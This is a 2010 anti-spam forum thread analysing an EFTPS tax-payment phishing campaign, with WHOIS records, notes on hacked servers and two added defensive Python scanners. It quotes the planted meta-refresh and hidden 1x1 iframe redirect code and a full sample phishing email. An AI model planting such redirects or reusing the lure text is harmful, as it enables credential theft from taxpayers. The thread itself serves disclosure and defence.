Electronic Federal Tax Payment System phish?

Postby Red Dwarf » Tue Oct 19, 2010 3:40 am

These URLs were found in spam, and redirect to sites on an nginx server, like
eftpsid0342943.ru/contacts/s3
eftpsid1363433.ru/contacts/s3

My guess is that this is a phishing attempt. These are all legitimate sites that have presumably been hacked, probably because of a weak admin or FTP password.

Each hacked site has had a folder added, and one or two html files (red4.html red5.html) inserted

Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10478
Joined: Tue Jun 27, 2006 2:01 am

Re: Electronic Federal Tax Payment System phish?

Postby Red Dwarf » Tue Oct 19, 2010 6:07 pm

The red4.html code contains
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://eftpsid0362283.ru/contacts/s3">


The refresh loads a Russian phishing site such as eftpsid0362283.ru
A look-up shows that this was registered in Russia on October 14

domain: EFTPSID0362283.RU
nserver: ns1.freedns.ws.
nserver: ns2.freedns.ws.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
phone: +7 495 7139598
e-mail: babkins@pochtamt.ru
registrar: REGRU-REG-RIPN
created: 2010.10.14
paid-till: 2011.10.14
source: TCI

Another earlier redirection went to eftpsid0363536.com which was registered at Moniker on October 7

Domain Name: EFTPSID0363536.COM
Registrar: MONIKER ONLINE SERVICES, INC.
Whois Server: whois.moniker.com
Referral URL: http://www.moniker.com/whois.html
Name Server: NS1.DOMAINSERVICE.COM
Name Server: NS2.DOMAINSERVICE.COM
Name Server: NS3.DOMAINSERVICE.COM
Name Server: NS4.DOMAINSERVICE.COM
Status: redemptionPeriod
Updated Date: 13-oct-2010
Creation Date: 07-oct-2010


A directory listing of a typical infected machine shows that a number of additional folders were created from October 10. Most folders contain phishing links, others contain links to a pharmacy fraud. The added folders are 6 or 7 characters long and contain the html files that perform the redirections. The compromise of these servers is most likely achieved because of a simple password on the administrator or FTP accounts. The administrator of these compromised machines should
1. detect and erase the additional folders and their contents
2. change access passwords to a more robust format containing mixed case, numeric and special characters

Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10478
Joined: Tue Jun 27, 2006 2:01 am

Re: Electronic Federal Tax Payment System phish?

Postby spamislame » Tue Oct 19, 2010 9:41 pm

I've been seeing tons of these since Spamit went down.

At no point have these urls ever loaded for me. In all cases both Google and numerous anti-malware products have instantly detected these urls as malicious.

When I do finally see a url that works, each of their html files are corrupt - they're also all less than 1k in size - and as a result I still have no idea what this is actually attempting to do nearly three weeks later.

Whoever is sending these is sending my domain in the hundreds of these messages per day, often several dozen per hour.

He doesn't seem to be very skilled.

First these were standalone domains, none of which would load. More recently, he's using hacked servers with a planted redirection html page. It's a routine apache exploit to get files onto the server, but in many cases it looks like this moron is not familiar enough with the exploit to tell when a given server is properly hacked and serving out the redirection pages.

Your examples at least do properly perform the redirections, but in all cases all I end up with is the following:

http://ongbakdu.on.funpic.de/dc96hp/red4.html

Redirects via a simple html meta-refresh to:

http://eftpsid0342943.ru/contacts/s3

That site merely outputs the text:

e44

What the hell is this trying to do?

It outputs the "e44" whether you have javascript enabled or not, so it's not an evasion of any sort.

This is a ridiculous spam campaign, poorly executed, by your typical unprepared Russian spamming moron.

SiL
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Electronic Federal Tax Payment System phish?

Postby Nodus » Tue Oct 19, 2010 10:52 pm

I just noticed there are quite a lot of newly verified entries of this type in PhishTank (under "Internal Revenue Service"). So Red was right, this seems to be quite a large phishing operation. There's also a warning at IRS.gov:

http://www.irs.gov/newsroom/article/0,,id=229075,00.html?portlet=7

At the same time the previously so active PayPal phish seems to have almost disappeared. Something is definitely going on "somewhere" :).
Arf, she said
Nodus
Spammer Obliterator
 
Posts: 2287
Joined: Fri Jun 15, 2007 7:05 pm

Re: Electronic Federal Tax Payment System phish?

Postby Red Dwarf » Wed Oct 20, 2010 5:05 pm

The redX.html files of 157 bytes are simply a redirect using refresh

The compromised servers have had a folder with one or a few such files installed. In some cases there are several such folders. In other cases the redirecting html files are placed in the server's root directory.

Some of these redirects went to Canadian Neighbor Pharmacy which now sits side-by-side with this Russian phishing operation - eftpsidnnnnnnn.ru

See the McAfee SiteAdvisor page for example

Examples removed by funpic - http://detg.de.funpic.de/ - which had folder /wy00as containing fub5k.html (eftpsid phishing)
And http://detg.de.funpic.de/p36uao2/process.html Canadian Neighbor Pharmacy redirect

Another example of side-by-side installations - http://xsunshinexgirlx.xs.ohost.de/
One subdirectory - 8xjpmsw/process.html - was used for the Canadian Neighbor Pharmacy fraud >> tabletsdrugstoreguide.com (now suspended)
others such as /sofo46/q9ccmw.html - were used for the eftpsid phishing attack

Here is a typical current example from compromised host http://www.tonycustomwood.com/red4.html
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://eftpsid0342943.ru/contacts/s3">
</head><iframe src="http://eftpsid0342943.ru/contacts/s3" width=1 height=1></iframe>
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10478
Joined: Tue Jun 27, 2006 2:01 am
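
Added example (not part of the original posts, and not code from any forum member): a Python sketch of the clean-up check the posts above ask server administrators to perform, walking a web root for HTML files whose meta refresh or 1x1 iframe points at a different host. The host names, the folder name `x7k2qpd` and the sample files are constructed for illustration; the 1 KB size cutoff and the 6-7 character folder heuristic are taken from the descriptions in the thread.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

TINY = 1024  # bytes; the planted pages in the thread were 157 bytes, all under 1 KB
META_TAG = re.compile(r"<meta\b[^>]*>", re.I)
IS_REFRESH = re.compile(r"http-equiv\s*=\s*[\"']?refresh", re.I)
REFRESH_URL = re.compile(r"url\s*=\s*[\"']?([^\"'>\s]+)", re.I)
IFRAME = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*[\"']?([^\"'>\s]+)[^>]*>", re.I)
DIMENSION = re.compile(r"\b(?:width|height)\s*=\s*[\"']?(\d+)", re.I)
RANDOM_DIR = re.compile(r"[a-z0-9]{6,7}")  # weak heuristic for the 6-7 character folders

def external_targets(html, own_host):
    """Return (kind, host) for meta refreshes and 1x1 iframes that leave own_host."""
    urls = []
    for tag in META_TAG.findall(html):
        match = REFRESH_URL.search(tag)
        if IS_REFRESH.search(tag) and match:
            urls.append(("meta-refresh", match.group(1)))
    for match in IFRAME.finditer(html):
        dims = [int(d) for d in DIMENSION.findall(match.group(0))]
        if dims and max(dims) <= 1:
            urls.append(("hidden-iframe", match.group(1)))
    hits = []
    for kind, url in urls:
        host = (urlparse(url).hostname or "").lower()
        # Relative URLs have no host; same-site redirects are legitimate.
        if host and host != own_host and not host.endswith("." + own_host):
            hits.append((kind, host))
    return hits

def scan_webroot(root, own_host):
    """Walk root and report HTML files that send visitors to another host."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".html", ".htm")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", errors="replace") as handle:
                targets = external_targets(handle.read(), own_host.lower())
            if not targets:
                continue
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            parent = os.path.basename(os.path.dirname(rel))
            findings.append({"path": rel, "targets": targets,
                             "tiny": os.path.getsize(path) <= TINY,
                             "random_folder": bool(RANDOM_DIR.fullmatch(parent))})
    return sorted(findings, key=lambda item: item["path"])

def build_sample_webroot(root):
    """Write a constructed web root: two planted pages and two legitimate ones."""
    refresh = '<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://redirect-target.example/contacts/s3">\n'
    iframe = '</head><iframe src="http://redirect-target.example/contacts/s3" width=1 height=1></iframe>\n'
    pages = {
        "index.html": "<html><body>" + "<p>Welcome to the shop.</p>" * 60 + "</body></html>",
        "old.html": '<meta http-equiv="refresh" content="0; url=http://www.example.org/new.html">',
        "x7k2qpd/red4.html": refresh,
        "red5.html": refresh + iframe,
    }
    for rel, body in pages.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as handle:
            handle.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as webroot:
        build_sample_webroot(webroot)
        for finding in scan_webroot(webroot, "www.example.org"):
            print(finding)
```

Every hit needs a manual look before deletion: `random_folder` and `tiny` are supporting signals only, since the thread also reports planted files sitting directly in the server's root directory.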

Re: Electronic Federal Tax Payment System phish?

Postby Red Dwarf » Wed Oct 20, 2010 5:17 pm

Here is a list of phishing URLs sitting on compromised systems, extracted from over 100 spammed in the past day

Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10478
Joined: Tue Jun 27, 2006 2:01 am

Re: Electronic Federal Tax Payment System phish?

Postby spamislame » Thu Oct 21, 2010 11:54 am

In almost all of these cases, whenever I attempt to load any of the red###.html files (in firefox) the following message is returned:

The connection was reset
The connection to the server was reset while the page was loading.

Many from a random sampling of that list have already been removed. :)

SiL
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Electronic Federal Tax Payment System phish?

Postby meep » Thu Oct 21, 2010 12:08 pm

I have seen some of these spam myself, but no time really to look at them. Mike Lennon says in this Security Week article that this is just a ZeuS / ZBot trojan variant here using the typical fast flux DNS crap found on various botnets:

Cybercriminals Attack EFTPS.gov Users, Businesses Targeted in Another Massive ZeuS Attack

By Mike Lennon 10/15/10
A recent and growing attack has been targeting the business world, sending warning messages to recipients and notifying them of problems with their tax payments through the government’s EFTPS.gov Web site. As we write this the attack appears to be in full swing, with data showing a massive spike in the volume of malicious emails coming from this attack being sent today. ...
meep
Spammers' Nightmare
 
Posts: 2777
Joined: Thu Apr 05, 2007 4:10 pm

Re: Electronic Federal Tax Payment System phish?

Postby Red Dwarf » Thu Oct 21, 2010 9:01 pm

This comment hits the nail right on the head
"This attack involved over 800 compromised web servers whose only purpose was to redirect the victim's browser on to a web exploit toolkit. The criminals did this in an attempt to evade the URL reputation used by most anti-spam systems," said Cisco's Henry Stern.


By using legitimate servers and compromising them by adding a few files to achieve redirection, these criminals are not only avoiding URIBL blacklisting, but also the complaint process to registrars regarding the criminals' own registered domains.
However, all redirections go to a smaller range of phishing sites which are the easier target to address, despite being located in a safe haven, Russia itself. Even if the owners of those sites are not ready to shut down the phishing sites at the registrar or ISP level, today's more sophisticated browsers can protect Internet users with their built-in reputation based systems -
eftpsid0342943.ru may try to steal your information.
Reported attack site!
This web page at eftpsid1363433.ru has been reported as an attack page and has been blocked based on your security preferences.
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10478
Joined: Tue Jun 27, 2006 2:01 am

Re: Electronic Federal Tax Payment System phish?

Postby Red Dwarf » Thu Oct 21, 2010 11:07 pm

Sample phish:
Your Federal Tax Payment ID: 01037599117 has been rejected.
Please, check the information and refer to Code R21 to get details about your company payment in transaction contacts section:
http://eftps.gov/R21

Return Reason Code R21 - The identification number used in the Company Identification Field is not valid.
In other way forward information to your accountant adviser.

on the site. James was appointed guardian of his two younger brothers, William Wright and Joseph Tarpelin,
EFTPS:
The Electronic Federal Tax Payment System
WARNING!
You are using an Official United States Government System, which may be used only for authorized purposes. Unauthorized modification of any information stored on this system may result in criminal prosecution. The Government may monitor and audit the usage of this system, and all persons are hereby notified that the use of this system constitutes consent to such monitoring and auditing. Unauthorized attempts to upload information and/or change information on this web site are strictly prohibited and are subject to prosecution under the Computer Fraud and Abuse Act of 1986 and Title 18 U.S.C. Sec. 1001 and 1030.


The link tries to load http://andorland777.an.funpic.de/red.html but the folks at funpic.de have removed it.
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10478
Joined: Tue Jun 27, 2006 2:01 am
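
Added example (not part of the original posts): the sample phish above displays `http://eftps.gov/R21` while the link actually loads a page on a different host, which a mail filter can test for directly. This Python sketch compares the host shown in each anchor's text with the host in its `href`; the HTML body is constructed from the sample quoted in the post, and the simple suffix comparison of host names is an assumption of this example, not a full registered-domain check.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_LIKE = re.compile(r"^(?:https?://)?[a-z0-9.-]+\.[a-z]{2,}(?:/\S*)?$", re.I)

class AnchorCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element in an HTML body."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def host_of(value):
    """Lower-cased host of a URL or bare hostname, without a leading 'www.'."""
    if "://" not in value:
        value = "http://" + value
    host = (urlparse(value).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host

def find_mismatched_links(html_body):
    """Return links whose visible text names one host while href goes to another."""
    parser = AnchorCollector()
    parser.feed(html_body)
    parser.close()
    findings = []
    for href, text in parser.links:
        if not href.lower().startswith(("http://", "https://")):
            continue
        if not URL_LIKE.match(text):
            continue  # text such as "click here" makes no claim about the target
        shown, actual = host_of(text), host_of(href)
        if shown != actual and not actual.endswith("." + shown):
            findings.append({"shown_host": shown, "actual_host": actual, "href": href})
    return findings

# Constructed HTML body modelled on the sample phish quoted in the post above.
SAMPLE_EMAIL_HTML = """
<p>Your Federal Tax Payment ID: 01037599117 has been rejected.</p>
<p>Please, check the information and refer to Code R21:
<a href="http://andorland777.an.funpic.de/red.html">http://eftps.gov/R21</a></p>
<p><a href="http://www.irs.gov/newsroom/">www.irs.gov</a>
<a href="http://example.org/unsubscribe">click here</a></p>
"""

if __name__ == "__main__":
    for finding in find_mismatched_links(SAMPLE_EMAIL_HTML):
        print(finding)
```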

Re: Electronic Federal Tax Payment System phish?

Postby Red Dwarf » Sat Oct 23, 2010 1:23 am

To date, we have seen 175 domains or service providers whose passwords were too easy to guess.
It is good practice to have passwords that are at least 10 characters in length, made up of alphabetic (a-z), numeric (0-9) and special (!@#$%^&*()_+-={}[]\|:";'<~`>?) characters

The domains detected as being used for EFTPS phishing are listed below.

If your domain name is on the list, check your system for the added files, remove them, and upgrade your administrator and FTP passwords to prevent further infections.

Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10478
Joined: Tue Jun 27, 2006 2:01 am

Re: Electronic Federal Tax Payment System phish?

Postby NotBuyingIt » Mon Oct 25, 2010 2:19 pm

meep wrote:Mike Lennon says ... that this is just a ZeuS / ZBot trojan variant here using the typical fast flux DNS crap found on various botnets
The scam uses not-very-fast-at-all flux DNS as if the changes are being done manually. I suppose it may qualify as a "double flux" DNS tactic because over the course of several days, the DNS provider changes. I have forgotten at least one of those DNS providers, but the scam alternates between afraid.org and freedns.ws, and is newly using xtremeweb.de

The template of the URLs used for redirection has changed from "http://stooge-site.com/red*.html" to "http://stooge-site.com/about.html"
Home is where the heart is / No matter how the heart lives.
NotBuyingIt
Spammer Killing Machine
 
Posts: 611
Joined: Sun Jun 13, 2010 5:22 pm

Re: Electronic Federal Tax Payment System phish?

Postby Red Dwarf » Mon Oct 25, 2010 10:11 pm

Please see the information in the Botnets, Hijacks and Hijacking Forum for examples.

This infection changes daily and alternates between Pharmacy targets and Phish

viewtopic.php?f=23&p=49261

Today, eftpsid is back in vogue.
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10478
Joined: Tue Jun 27, 2006 2:01 am

Re: Electronic Federal Tax Payment System phish?

Postby Red Dwarf » Mon Oct 25, 2010 10:17 pm

NotBuyingIt wrote:
meep wrote:Mike Lennon says ... that this is just a ZeuS / ZBot trojan variant here using the typical fast flux DNS crap found on various botnets
The scam uses not-very-fast-at-all flux DNS as if the changes are being done manually. I suppose it may qualify as a "double flux" DNS tactic because over the course of several days, the DNS provider changes. I have forgotten at least one of those DNS providers, but the scam alternates between afraid.org and freedns.ws, and is newly using xtremeweb.de


Journalists have learned to use technical expressions like Zeus botnet and Fast-flux DNS.
Only a few have learned what they mean. I fear that Mike Lennon is not yet one of the few.
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10478
Joined: Tue Jun 27, 2006 2:01 am

Re: Electronic Federal Tax Payment System phish?

Postby Bobster » Tue Nov 09, 2010 3:28 pm

Based on the spam I have received, I strongly suspect that the criminal (or criminals) behind this is the same one that recently hacked Aweber for the second time in less than a year.
"The trouble with the world is that the stupid are cocksure
and the intelligent are full of doubt." -- Bertrand Russell
Bobster
Spam Reporter
 
Posts: 207
Joined: Fri Mar 23, 2007 4:16 pm

